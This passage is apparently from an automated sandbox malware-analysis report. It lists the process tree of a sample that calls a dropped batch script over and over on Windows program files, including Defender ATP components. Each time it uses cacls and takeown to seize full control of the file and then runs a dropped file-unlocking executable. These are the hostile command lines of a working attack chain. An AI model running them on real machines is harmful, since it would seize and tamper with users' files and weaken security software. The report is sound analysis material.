- Executes dropped EXE
PID:4164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:3872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:3732
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4724
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4644
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:4868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:4636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "wabmig.exe" -nobanner3⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:4980
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:5056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:4964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "wab.exe" -nobanner3⤵PID:3756
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:636
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""2⤵PID:4252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "classes.jsa" -nobanner3⤵PID:4356
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4460
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe""2⤵PID:4244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G Admin:F /C3⤵PID:4560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "MsSense.exe" -nobanner3⤵PID:4648
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "MsSense.exe" -nobanner4⤵
- Executes dropped EXE
PID:4680
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:1768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:4796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4748
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4844
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:4832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:4996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:640
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:5076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:5096
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4408
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""2⤵PID:4324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C3⤵PID:4280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "BrowserCore.exe.mui" -nobanner3⤵PID:4736
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "BrowserCore.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4740
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:4772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:4864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:4604
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "WinMail.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4932
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""2⤵PID:4412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C3⤵PID:4200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "manifest.json" -nobanner3⤵PID:4544
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "manifest.json" -nobanner4⤵
- Executes dropped EXE
PID:4600
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:4192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "WinMail.exe" -nobanner3⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "WinMail.exe" -nobanner4⤵
- Executes dropped EXE
PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe""2⤵PID:4588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" /E /G Admin:F /C3⤵PID:4992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "SenseCncProxy.exe" -nobanner3⤵PID:3916
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "SenseCncProxy.exe" -nobanner4⤵
- Executes dropped EXE
PID:4668
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:4420
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:5080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:3736
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
PID:4416
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe""2⤵PID:4124
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe" /E /G Admin:F /C3⤵PID:4696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"3⤵
- Modifies file permissions
PID:5048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "SenseSampleUploader.exe" -nobanner3⤵PID:4920
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "SenseSampleUploader.exe" -nobanner4⤵
- Executes dropped EXE
PID:248
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""2⤵PID:4112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C3⤵PID:4612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"3⤵
- Modifies file permissions
PID:4784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "BrowserCore.exe" -nobanner3⤵PID:4812
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "BrowserCore.exe" -nobanner4⤵
- Executes dropped EXE
PID:4756
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""2⤵PID:4564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:4376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"3⤵
- Modifies file permissions
PID:4828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "Identity-H" -nobanner3⤵PID:4892
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "Identity-H" -nobanner4⤵
- Executes dropped EXE
PID:1292
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:3764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:1888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:5032
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4624
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""2⤵PID:576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:4396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"3⤵
- Modifies file permissions
PID:4400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "Identity-V" -nobanner3⤵PID:632
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "Identity-V" -nobanner4⤵
- Executes dropped EXE
PID:276
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:4956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:5064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
PID:4884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:4808
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:5016
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:3748
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:4700
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
PID:4860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:4824
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
PID:3456
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:4760
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:4300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4676
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4792
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:4328
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
PID:4968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "wab.exe" -nobanner3⤵PID:264
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:4816
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵PID:4108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:5116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵
- Modifies file permissions
PID:2732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵
- Executes dropped EXE
PID:5112
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4720
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:4804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
PID:1660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:4836
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:5100
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:3172
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:5104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
PID:268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:856
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4136
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:5160
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:5208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
PID:5228
